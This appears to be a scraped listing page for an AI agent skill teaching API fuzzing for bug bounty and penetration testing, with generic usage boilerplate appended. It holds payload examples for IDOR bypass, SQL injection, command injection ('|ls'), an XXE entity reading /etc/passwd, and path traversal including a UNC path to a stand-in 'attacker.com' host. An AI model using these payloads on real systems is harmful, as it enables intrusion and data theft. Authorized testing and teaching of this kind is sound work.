Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.
Confirm successful installation by checking the skill directory location:
.cursor/skills/api-fuzzing-for-bug-bounty
Restart Cursor to activate api-fuzzing-for-bug-bounty. Access via /api-fuzzing-for-bug-bounty in your agent's command palette.
β
Security Notice
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your environment. Always review source, verify the publisher, and test in isolation before production.
Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.
Inputs/Prerequisites
Burp Suite or similar proxy tool
API wordlists (SecLists, api_wordlist)
Understanding of REST/GraphQL/SOAP protocols
Python for scripting
Target API endpoints and documentation (if available)
Outputs/Deliverables
Identified API vulnerabilities
IDOR exploitation proofs
Authentication bypass techniques
SQL injection points
Unauthorized data access documentation
API Types Overview
Type
Protocol
Data Format
Structure
SOAP
HTTP
XML
Header + Body
REST
HTTP
JSON/XML/URL
Defined endpoints
GraphQL
HTTP
Custom Query
Single endpoint
Core Workflow
Step 1: API Reconnaissance
Identify API type and enumerate endpoints:
# Check for Swagger/OpenAPI documentation/swagger.json
/openapi.json
/api-docs
/v1/api-docs
/swagger-ui.html
# Use Kiterunner for API discoverykr scan https://target.com -w routes-large.kite
# Extract paths from Swaggerpython3 json2paths.py swagger.json
Step 2: Authentication Testing
# Test different login paths/api/mobile/login
/api/v3/login
/api/magic_link
/api/admin/login
# Check rate limiting on auth endpoints# If no rate limit β brute force possible# Test mobile vs web API separately# Don't assume same security controls
Step 3: IDOR Testing
Insecure Direct Object Reference is the most common API vulnerability:
# Basic IDORGET /api/users/1234 β GET /api/users/1235
# Even if ID is email-based, try numeric/?user_id=111 instead of /?user_id=[email protected]# Test /me/orders vs /user/654321/orders
IDOR Bypass Techniques:
# Wrap ID in array{"id":111} β {"id":[111]}# JSON wrap{"id":111} β {"id":{"id":111}}# Send ID twiceURL?id=<LEGIT>&id=<VICTIM># Wildcard injection{"user_id":"*"}# Parameter pollution/api/get_profile?user_id=<victim>&user_id=<legit>{"user_id":<legit_id>,"user_id":<victim_id>}
Step 4: Injection Testing
SQL Injection in JSON:
{"id":"56456"} β OK
{"id":"56456 AND 1=1#"} β OK
{"id":"56456 AND 1=2#"} β OK
{"id":"56456 AND 1=3#"} β ERROR (vulnerable!)
{"id":"56456 AND sleep(15)#"} β SLEEP 15 SEC
Command Injection:
# Ruby on Rails?url=Kernel#open β ?url=|ls# Linux command injectionapi.url.com/endpoint?name=file.txt;ls%20/
XXE Injection:
<!DOCTYPEtest[ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
# If .NET app uses Path.Combine(path_1, path_2)# Test for path traversalhttps://example.org/download?filename=a.png
https://example.org/download?filename=C:\inetpub\wwwroot\web.config
https://example.org/download?filename=\\smb.dns.attacker.com\a.png
Step 5: Method Testing
# Test all HTTP methodsGET /api/v1/users/1
POST /api/v1/users/1
PUT /api/v1/users/1
DELETE /api/v1/users/1
PATCH /api/v1/users/1
# Switch content typeContent-Type: application/json β application/xml
βΊClaude Desktop or compatible AI client with skill support
βΊClear understanding of task or problem to solve
βΊWillingness to iterate and refine outputs
Time Estimate
15-45 minutes depending on use case complexity
Steps
1Install skill using provided installation command
2Test with simple use case relevant to your work
3Evaluate output quality and relevance
4Iterate on prompts to improve results
5Integrate into regular workflow if valuable
Common Pitfalls
β Expecting perfect results without iteration
β Not providing enough context in prompts
β Using skill for tasks outside its intended scope
β Accepting outputs without review and validation
Best Practices
β Do
+Start with clear, specific prompts
+Provide relevant context and constraints
+Review and refine all outputs before using
+Iterate to improve output quality
+Document successful prompt patterns
β Don't
βDon't use without understanding skill limitations
βDon't skip validation of outputs
βDon't share sensitive information in prompts
βDon't expect skill to replace human judgment
π‘ Pro Tips
β Be specific about desired format and style
β Ask for multiple options to choose from
β Request explanations to understand reasoning
β Combine AI efficiency with human expertise
When to Use This
β Use when
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
β Avoid when
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
Learning Path
1Familiarize yourself with skill capabilities and limitations
2Start with low-risk, non-critical tasks
3Progress to more complex and valuable use cases
4Build expertise through regular use and experimentation
